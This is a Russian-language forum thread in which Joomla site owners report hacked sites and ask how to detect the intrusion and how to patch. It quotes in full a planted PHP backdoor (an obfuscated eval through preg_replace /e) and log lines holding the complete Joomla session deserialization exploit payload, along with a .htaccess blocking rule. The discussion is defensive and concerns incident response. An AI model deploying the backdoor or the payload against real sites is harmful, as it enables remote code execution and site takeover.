залили в media/editors/tinymce/skins/lightgray/img/thumb.php
его раньше не было
Джумла 2.5
На 1.5 не знаю как найти, это антивирус нашел.
Знающие не подскажите ка кна хсотинге - ИСП менеджер, посомтреть какие файлы были залиты последними ?
в лгах то чт о и увас потом такая запись сразу же
16/Dec/2015:07:58:38 +0200] "POST / HTTP/1.0" 301 310 "-" "python-requests/2.4.3 CPython/3.4.2 Linux/2.6.32-042stab112.15"
146.0.72.80 - - [16/Dec/2015:07:58:43 +0200] "GET / HTTP/1.0" 200 131532 "-" "python-requests/2.4.3 CPython/3.4.2 Linux/2.6.32-042stab112.15"
залили на сайты вот это
<?php
if(isset($_POST['jml'])){($www = $_POST['jml']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
что это значит, кто то может сказать ?
можете скинуть ссылочку плиз на офф сайт, нужно для джумлы 1.5 и 2.5
если после этого запроса сначла 301 ответ, потом 200 значит взломали ?
и есть смысл сейчас прямо патчить, либо восстановить из бекапа и потом патчить ?---------- Добавлено 16.12.2015 в 19:54 ----------с вашего сайта просто заменить папку libraries или сам файл session.php ?
для старых сайтов с 1.5 версией непонятно откуда патчи брать
да через апач
В стандартном хтассес джумлы нужно просто это дописать или где то заменить ?
RewriteCond %{HTTP_USER_AGENT} .*\{.* [NC]
RewriteRule .* - [F,L]---------- Добавлено 16.12.2015 в 18:24 ----------помогите срочно, куда это записать и вместо чего ?
на некоторых сайтах есть признаки типа такого
4.3.170.33 – – [12/Dec/2015:16:49:40 -0500] “GET /contact/ HTTP/1.1″ 403 5322 “http://google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..
{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:..
{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:.---------- Добавлено 16.12.2015 в 18:44 ----------практически на все сайты в течении дня были такие запросы
195.154.56.44 - - [16/Dec/2015:04:30:48 +0200] "GET / HTTP/1.0" 301 316 "http://site.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
207.244.70.35 - - [16/Dec/2015:04:31:05 +0200] "GET / HTTP/1.0" 200 44717 "http://site.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86
Сайты уже взломаны как определить ?
и стоит сейчас в хтассес дописывать ?
там написано, что это актуально для удаленного пользователя.
Если на сайтах вообще отключена регистрация пользователей и пр ? все равно закрывать нужно ?
А если как рекомендуют на сайт в хтассес дописать
RewriteRule .* - [F,L]
Поможет ?
по форексу что то есть или будет ?
к стате ливинтернет
когда последние материалы размещались ?
на каком движке сайт и форум ?
можете доступ ли открыть ?
